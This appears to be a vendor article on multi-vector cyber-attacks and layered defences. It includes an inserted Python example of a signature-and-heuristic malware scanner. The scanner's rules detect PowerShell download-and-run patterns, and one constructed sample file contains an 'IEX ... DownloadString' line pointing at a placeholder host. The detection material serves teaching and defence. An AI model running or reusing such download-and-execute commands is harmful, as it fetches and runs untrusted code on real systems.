Modern cyber-attackers are no longer tech-savvy opportunists; they are highly organised criminal groups operating against sophisticated plans and strategies. Many now conduct extensive reconnaissance on victims before carrying out attacks designed to inflict significant damage in a very short space of time. The majority of these attacks are multi-vector in nature, meaning they combine several different types of cyber-attack (such as spear-phishing and ransomware) into one sustained assault on the victim's network. Unfortunately, it's a highly effective approach. If just one part of a system is unprotected, a multi-vector attack will usually be able to find and exploit it.
The bad news is that it's getting worse, too. A recent Osterman report found that both phishing and crypto ransomware attacks are increasing at the rate of several hundred percent per quarter, a trend that is expected to continue for at least the next 18 to 24 months.
The growing threat of multi-vector attacks
In the past, when attackers wanted to infiltrate a network they would almost always target systems, servers and computers because these were seen to be the most vulnerable components. However, this approach was difficult and did not always guarantee success. Today, attackers focus on a far easier point of network vulnerability - the users. Not only do all network users have internet access, but many operate across multiple devices, including personal devices that don't have the latest security updates on them. All of this creates a plethora of attack vectors and vulnerability points, which are easy to exploit. But how does a multi-vector attack actually work in practice? Below is an example of the typical process criminals follow:
1. Automatic reconnaissance – Cyber-attacks today rarely begin with a full frontal assault on the target organisation. First, criminals carry out detailed reconnaissance, finding small contractors who work with the intended victim and have access to its network, but whose cyber-security is less advanced.
2. Gain access to credentials - Once these more vulnerable partners and contractors have been found, a combination of social engineering and spyware is used to acquire valid credentials for the target victim's network.
3. Use credentials for backdoor entry - With credentials secured, they can silently enter the network using any one of a number of backdoors. The larger and more complex a network is, the more backdoors it generally has.
4. Install APT/Ransomware – Once in, the real damage begins. Criminals can install advanced persistent threats and ransomware, many of which are polymorphic in nature, making them very hard to identify and eradicate.
5. Damage/Deface/Steal Data – These attacks then cause maximum damage in the network, deface websites, and steal both organisational and customer data.
6. Launch spear-phishing campaign – In tandem with step five, specifically targeted spear-phishing attacks are also launched, aimed at important individuals within the organisation such as the CEO, board members and those working in the finance or accounts payable departments.
7. Demand Ransom – Finally, if ransomware was installed at stage four, it is then detonated and a ransom demanded from the victim.
Levelling the playing field
The threat of comprehensive attacks requires comprehensive defences. Businesses can significantly improve their defences by ensuring a thorough cyber-security setup is in place with the following key measures:
Monitor and secure all possible threat vectors
Providing end-to-end security isn't easy, and IT teams should start by taking three key steps:
- Detect: Have the capability to understand what's going on with monitoring software. Ensure IT teams and staff are well trained, scan email inboxes regularly and make sure that threats can be pinpointed down to a specific device.
- Prevent: Utilise preventative measures such as scanning for web app vulnerabilities and existing spyware. Implement Advanced Threat Detection if possible.
- Recover: Ensure all data is recoverable.
Update security measures to fit with the Cloud
The Cloud is becoming increasingly common amongst businesses of all sizes. As Cloud adoption grows, make sure security measures adapt accordingly. Adopting a range of solutions designed to work in the Cloud allows businesses to analyse and protect hosted data more effectively.
Implement static and dynamic security measures
Utilising both static and dynamic methods of threat detection will help ensure all potential threats are picked up:
- Static Analysis - Heuristic scanning uses a predefined set of rules and algorithms to seek out commands present in the system that might indicate malicious activity. Signature-based scanning matches signatures extracted from known malware (byte patterns or file hashes) against files present on the network.
- Dynamic Analysis – By using a fully Cloud-based system emulator within a sandbox, organisations can open and examine files without putting the system at risk from malicious attachments.
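To make the static-analysis bullet concrete, here is a small scanner that combines the two techniques it describes: hash and byte-pattern signatures for known samples, and weighted heuristic rules whose combined score flags scripts that chain commonly abused commands together. This is an added example, not code from the article or from Barracuda Networks; every signature, rule weight, threshold and sample file in it is constructed for the illustration, and the sample files are not real malware.

```python
"""Minimal static scanner: signature matching plus scored heuristic rules (added example)."""
import hashlib
import re

# --- Signature-based rules --------------------------------------------------
# Byte patterns "extracted" from known samples. These are constructed markers,
# not real malware signatures.
BYTE_SIGNATURES = {
    "Constructed.Marker.A": b"CONSTRUCTED-MALWARE-MARKER-7f3a",
}

# Hash signatures: SHA-256 of whole files. The hash is computed here from a
# constructed sample so the example stays self-contained and offline.
CONSTRUCTED_DROPPER = b"constructed dropper sample used only for this example\n"
HASH_SIGNATURES = {
    hashlib.sha256(CONSTRUCTED_DROPPER).hexdigest(): "Constructed.Dropper.A",
}

# --- Heuristic rules --------------------------------------------------------
# Each rule is (name, regex, weight). Any one of these is common in legitimate
# admin scripts; it is the combination that pushes the score over the threshold.
HEURISTIC_RULES = [
    ("hidden-window", re.compile(rb"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("encoded-command", re.compile(rb"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("download-and-run", re.compile(rb"DownloadString|DownloadFile", re.I), 2),
    ("invoke-expression", re.compile(rb"\b(?:IEX|Invoke-Expression)\b", re.I), 2),
]
SUSPICIOUS_THRESHOLD = 5  # constructed value for the example


def scan_bytes(name: str, data: bytes) -> dict:
    """Scan one file's contents; signatures take precedence over heuristics."""
    reasons = []

    # 1. Signature checks: exact hash of the whole file, then byte patterns.
    digest = hashlib.sha256(data).hexdigest()
    if digest in HASH_SIGNATURES:
        reasons.append(f"hash-signature:{HASH_SIGNATURES[digest]}")
    for sig_name, pattern in BYTE_SIGNATURES.items():
        if pattern in data:
            reasons.append(f"byte-signature:{sig_name}")
    signature_hit = bool(reasons)

    # 2. Heuristic checks: sum the weights of every rule that fires.
    score = 0
    for rule_name, regex, weight in HEURISTIC_RULES:
        if regex.search(data):
            score += weight
            reasons.append(f"heuristic:{rule_name}(+{weight})")

    if signature_hit:
        verdict = "malicious"
    elif score >= SUSPICIOUS_THRESHOLD:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"name": name, "verdict": verdict, "score": score, "reasons": reasons}


def scan_all(samples: dict) -> dict:
    """Return {file name: verdict} for a mapping of file name -> contents."""
    return {name: scan_bytes(name, data)["verdict"] for name, data in samples.items()}


# Constructed sample "files". The base64 blob is a placeholder (UTF-16LE "AAAA..."),
# and the URL uses the reserved .invalid domain, so nothing here is live.
SAMPLES = {
    "dropper.bin": CONSTRUCTED_DROPPER,
    "archive.dat": b"harmless header\n" + b"CONSTRUCTED-MALWARE-MARKER-7f3a" + b"\ntrailer\n",
    "invoice_stage.ps1": (
        b"powershell.exe -nop -w hidden -EncodedCommand " + b"QQBBAEEA" * 5 + b"\n"
        b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\n"
    ),
    "quarterly_report.txt": b"Q3 revenue summary: all figures in GBP. Prepared by finance.\n",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        result = scan_bytes(name, data)
        print(f"{name:22} {result['verdict']:10} score={result['score']} {result['reasons']}")
```

The dropper and the archive are caught purely by signature, which is exactly why signature scanning is fast and precise but blind to polymorphic variants whose bytes change. The PowerShell sample matches no signature at all and is flagged only because four individually ordinary features score 9 together; the report file scores 0. Tuning the weights and threshold against a corpus of known-good admin scripts is what keeps the heuristic side from drowning the IT team in false positives.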
Plan for the worst - ensure all data is recoverable
Corrupted, damaged or stolen data will always cause problems for a business, but especially so if it cannot be recovered. Ensure data across all platforms is recoverable so even if the worst does happen, the damage is limited.
Today's business world is one where complex, sustained cyber-attacks are increasingly commonplace. However, this doesn't mean businesses are powerless to prevent themselves from becoming the next victim. Implementing a comprehensive and well thought out cyber-defence strategy can level the playing field against even the most intricate multi-vector attacks, thwarting attackers and protecting precious data.
Contributed by Wieland Alge, VP and GM EMEA, Barracuda Networks